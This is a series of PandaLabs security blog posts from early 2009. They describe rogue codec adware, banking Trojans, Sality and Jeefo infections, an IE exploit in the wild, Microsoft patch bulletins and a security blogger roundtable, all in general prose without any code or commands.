Rogue Fake Codec – Finding the differences

In the last days we have received a good number of new variants of rogue fake codec. That’s why we propose you a little game that consists in finding the differences between the images:

All these variants have been detected as Adware/VideoPlay. Their behavior is similar: when installing the program, a file, whose name is usually matrix(random numbers).exe or bootmatrix.exe, is run. This file spreads by making copies of itself in the removable drives and it also creates an autorun.inf in order to be run when they are accessed.

This file collects the data stored in the browsers, such as cookies, passwords, profiles, email accounts, etc, and connects to a remote address to send the information.

In the last month there has been an increase of almost 400% in the number of samples of this malware received in our inboxes comparing with the previous month.

 

 

This nasty piece of malware is the same as the one that was being distributed using Digg and YouTube.

Can we cope with the increasing malware?

Recently, we published the latest bulletin about the steep increase of Banker Trojans. Today we have massive amounts of malware circulating the Web and most of them are Financial/Identity Theft related. See the report: here

The increase in the volume of malware in circulation has been exponential over the last few years. In 2007 we received more malware samples than in the previous 17 years combined. Our forecasts for 2008 indicated that we would end the year with some 7 or 8 million malware strains, however, we actually ended up with over 15 million malware specimens.

To fully understand the explosive increases in samples, you must first understand the characteristics of this new, increasingly complex malware. As you may already know, we rarely face large epidemics triggered by fame-craving virus writers looking to infect thousands of computers. Instead, today's malware writers are heavily focusing on monetary gain. The goals of modern day cyber-criminals are to maximize the profit from their creations.

This is seen in the evolution of the following malware types throughout last year:

Types of malware received at PandaLabs in January 2009

As we have published several times in this blog, today, there are huge illegal businesses behind this type of cyber-crime and criminal organizations are making a lot of profit from identity and data theft.

I'd like to share with you just a glimpse of how we have been able to fight this avalanche. The model that was previously used by the entire industry was clearly unsustainable over time, as it involved technicians manually examining the malware samples received at labs. Given the rate at which malware volume was increasing, how could we possibly answer our clients' needs? How long would that take? Could we keep clients protected? How many technicians would we need in just a few years' time to be able to analyze all these samples? So, in 2006 we decided to stop working like the others and started implementing what we call Collective Intelligence.

I don’t want to go into too much technical detail about this (those of you who are really interested in this subject can download the White Paper we published in early 2008: here. What we basically did was develop a system for automatically detecting, classifying and remediating malware. This approach offers a complete real-time protection for users with the minimum impact in their systems, as the entire process takes place “in the cloud”. Today, two years after we started implementing this technology into our products:

– We have classified over 17 million malware strains.
– We receive some 25,000 malware samples every day. With Collective Intelligence we can automatically analyze and classify 99.37% of it.
– Our current response time is 30 times shorter than two years ago.

Now that many companies are beginning to talk about cloud computing, It's amazing to think that we have implemented this technology over two years ago. The scalabilty of Collective Intelligence allows us to combat the new malware dynamic with a future proof concept, as it is clear that the number of malware in circulation will continue to grow in the future. With Collective Intelligence we can detect new malware very quickly and protect our clients in real time, which is our ultimate goal. Also, as most processes take place in the cloud, our solutions have no impact on our clients’ computers, one of the key objectives we had when developing this technology.

Finally, apart from the technological response that we, as security vendors, must offer to users, I think we also have to do everything possible to report this criminal activity, help public institutions and raise awareness among the general public to stop those that are behind the malware strains we get at our laboratories. This, however, will be the subject of another post.

Malware in Social Media

A few weeks ago we talked about cyber-criminals using Digg.com to spread malware. Today we see that the very same group responsible for the Digg.com incident was using the same tactic on YouTube through the use of YouTube's Annotations feature. Video Annotations is a way to add interactive commentary to videos on YouTube.

The following image displays a video using the annotations feature to guide users over to a malware ridden website:

Although the YouTube description malware is not as prevalent as the Digg.com comment abuse, it does show that Social Media websites are increasingly being used to spread Malware. We expect to see plenty of new examples similar to this throughout 2009.

Thanks to Dancho Danchev for the information.

Good (?) old times II

Some days ago we talked about how old infection techniques had emerged and how malware with economic goals had been combined with traditional viruses. Today, we have come across an interesting case with regard to one of the rogue morphs that has been recently detected, Antispyware3000.

 

The way it works is similar to the rest of rogue programs: once installed in the computer, it displays warning messages about false infections, so that we pay for the product, remove the threats and keep our system protected (which is not true, they will take our money and nothing else). The curious feature of this fake antivirus is that when accessing its website and downloading the installer; this installer is infected with W32/Jeefo.A, a virus that first appeared in 2003.

We don’t know whether the creators of this fake antivirus have done this on purpose or, on the contrary, they have not been careful enough when dealing with malware and have been given a taste of their own medicine.

Bank details uncovered

Olaiz, Technical writer at PandaLabs, has just published an interesting document about one of the main threats to users' privacy: Banking Trojans.

Among other things, you can find information about how they enter computers and how they steal information. One of the most remarkable data is the complex structure that is behind this lucrative criminal business. You may think that the creators of banker Trojans are the same individuals that actually steal money. However, it isn't as simple as this as you can see in the image below:

 

If you want to know how to interpret this diagram and are interested in knowing more about these threats, you can click the image below to access the document:

          

          Spanish           English

Finally, just remind you that in our PandaLabs Reports section, you can access the papers that have been published in PandaLabs.

MS09-002 Exploit in the Wild

Last Tuesday Microsoft released a Security Bulletin (MS09-002) for critical vulnerabilities which affected its Internet Explorer browser. The vulnerability exists because of improper error handling when accessing deleted objects and allows remote code execution through a specially crafted website.

This week a few websites in China started to actively exploit this vulnerability and the malware (jc.exe & wininet.dll) is detected as Spyware/Virtumonde. The websites involved in this example have been blocked by Panda’s Identity Protect Technology, which will block Panda's users before reaching the exploit sites.

   We recommend applying Microsoft's patch immediately.

Good (?) old times

Right now we are dealing with about 25,000 new malware samples per day. From time to time we remember the old days, when we were almost fighting each other in order to disassemble the latest virus we had received in the lab. Well, what were you expecting? We're freaks 😉

But the real thing is that nowadays most of the malware are Trojans, rogueware, etc. We are talking mainly about non-polymorphic and non-viral malware, and the major problem we may find are some packers or similar stuff trying to avoid AV signature detections, not a big deal when you have technologies such as TruPrevent, that are watching the behaviour of the program rather than the static file itself.

Malware evolves, and so do antimalware technologies. That’s why in our last Annual Report I was expecting that this year we would see an increase in the use of old techniques as a way to evade some of the technologies that the top AV vendors are using –> old viruses tricks, mixing virus & Trojans behaviours, etc. It turns out that we have seen this change already happening. The first week of February a new virus appeared, we called it W32/Sality.AO.

Why is this new variant of a well known file infector worth mentioning? Well, first it is smart enough to avoid being too promiscuous, as it will not scan the whole hard drive looking for files to infect, but will just infect some files upon running the malicious code and will also infect any new files that we run in our computer. Furthermore, it is using very complex techniques to infect PE files: EPO, Cavity, different encryption layers… and not always in the same way, one sample maybe infected using EPO and 1 encryption layer, another one using EPO, cavity and 2 encryption layers, and so on. If this wasn’t enough, it connects to an IRC server in order to receive commands. Even more, it will try to download files from the Internet in order to infect our computer with more malware. It also infects (I’d rather say "modifies") .PHP, .ASP and .HTML files by inserting an iFrame tag into them. When visiting any of these “infected” files through our web browser, it will use an exploit in order to download and run a new file. This file is a double-malware, a Trojan downloader infected with a virus.

And here we were missing some good old polymorphic and self-replicating action. Another variant of W32/Sality just came in. Looks like we're not going to get much sleep tonight. 

Defacement archive of Zone-H gets defaced

Several days ago, one of the main archives which contain records of the web defacement attacks carried out all over the world has been victim of web defacement. It is not the first time that Zone-H.org has received this type of attacks, as in January 2007 it was victim of similar attack.

A defacement consists of accessing a website illegally “by using malicious actions” and changing its home page, displaying claiming texts or any graffiti.

Below, you can see the defacement that has affected the Zone-H website.

Blogger Summit recap

Last week, Panda Security hosted the First Security Blogger Summit at the Círculo de Bellas Artes in Madrid. Over 200 people involved in IT security attended this inaugural event that included 11 security thought leaders debating in an engaging roundtable from the United States and Spain.

It was inspiring and energizing to hear the world’s foremost security experts put their minds together to tackle the tough issues that we face in IT security today.

Some of the attendees already posted their reactions to the event – Andy Willingham particularly enjoyed the lively debate about Security Awareness Training. Steve Ragan gave a great synopsis of the event overall, stressing how he believes events like these are extremely important to facilitate an ongoing dialogue. Steve suggested in his post that Panda include consumers as well as security experts in the next roundtable to hear what consumers’ perspective is – good idea, Steve!

 Video Coverage:

Cybercrime and Security 1: http://www.youtube.com/watch?v=jy-kkIhN7wM
Cybercrime and Security 2: http://www.youtube.com/watch?v=DPCuAb3xFTA
Quotes: http://www.youtube.com/watch?v=IrENqCujdmw
http://www.youtube.com/watch?v=Lgv85sWQv7k
Bruce Schneier´s introduction: http://www.youtube.com/watch?v=gHKSL_H35FY

Education and Proactive Protection
The session started with a 15 minute talk from Bruce Schneier. He emphasized the major advance that the Internet represents, calling it “one of the most important revolutions after Rock and Roll” and highlighting the economic factors that underlie security problems: “We could have better technology, but we are not prepared to pay for it. The market rewards the cool and the fast, but not the good.”

 

He also raised the issue of passing the responsibility of security onto our governments, stressing how users and companies must play an active role in protecting themselves. Byron Acohido countered with, “90% of the problem is not down to the user. If a system with errors is launched on the market, this is not a problem of the user.”

Francisco Lago jumped in stating, “The main problem is user behavior. Awareness campaigns about best practices were the most effective vehicle for avoiding security risks.” Andy Willingham and Steve Ragan, coincided in the need for experts to lead this education, but with simple, comprehensible language. “There are blogs and security media, but users do not understand them; and as long as they don't, we will continue to see the same errors time and time again,” emphasized Ragan.

Current situation and responses to cyber-crime
All speakers agreed that one of the main trends of the last few years has been the professionalization of cyber-criminals. Cesar Lorenzana explained, “It's not that there is more malware, it's that malware is now profitable for criminals. It's a way of earning a living.” Francisco Lago stressed the false sense of security among users, “80% of users believe that their computers are protected, yet three quarters of them are infected.”

Antonio Ortiz, illustrated the lengths that cyber-crooks go to in order to keep a low profile and avoid public institutions from pursuing them: “Owners of botnets do not offer services for DoS attacks on major websites or government pages because then politicians would focus on the problem. They don't want that kind of attention.”

Roundtable participants:

• Bruce Schneier, one of the most influential security theorists in the world
• Byron Acohido, technology journalist for USA Today and author of “Zero Day Threat”
• Steve Ragan, security editor for The Tech Herald
• Andy Willingham, author, blogger, and IT professional with expertise in financial services
• Ero Carrera, Chief Research Officer of Collaborative Security, VirusTota – Hispasec
• Antonio Ortiz, co-founder of Weblogs SL and editor of ERROR500
• Javier Villacañas, editor, network chief COP and founder of “A Todo Chip” blog

Check out or photos of the event on Flickr here:
http://www.flickr.com/photos/panda_security/tags/summit/

Microsoft Updates – February 2009

Microsoft has published the security bulletins MS009-02, MS009-03, M009-04 and MS009-05, which refer to 8 vulnerabilities. 3 are critical and 2 of them affect the Internet Explorer browser again. These 2 vulnerabilities could allow remote code execution if users visit a specially crafted website. The other critical vulnerability affects the versions 2000 Service Pack 3, 2003 Service Pack 2 y 2007 Service Pack 1 of Microsoft Exchange Server and allows remote code execution by sending a specially modified email message.

The other 5 have been rated as important by Microsoft, one of them also affects Microsoft Exchange Server 2003 Service Pack 2 and Microsoft Exchange 2007 Service Pack. If exploited successfully, it causes a denial of service in the target server when a specially modified MAPI command is sent to the server.

The other vulnerability affects several versions of Microsoft SQL Server, which can be exploited through the stored procedure called sp_replwritetovarbin. This vulnerability can be also exploited through websites vulnerable to SQL Injection attacks. The 3 other vulnerabilities affect Microsoft Visio, which allow a malicious user to execute remote code if a specially crafted Visio file is created.

You can obtain more information about these vulnerabilities in the following links:

MS09-002 – MS09-003 – MS09-004 – MS09-005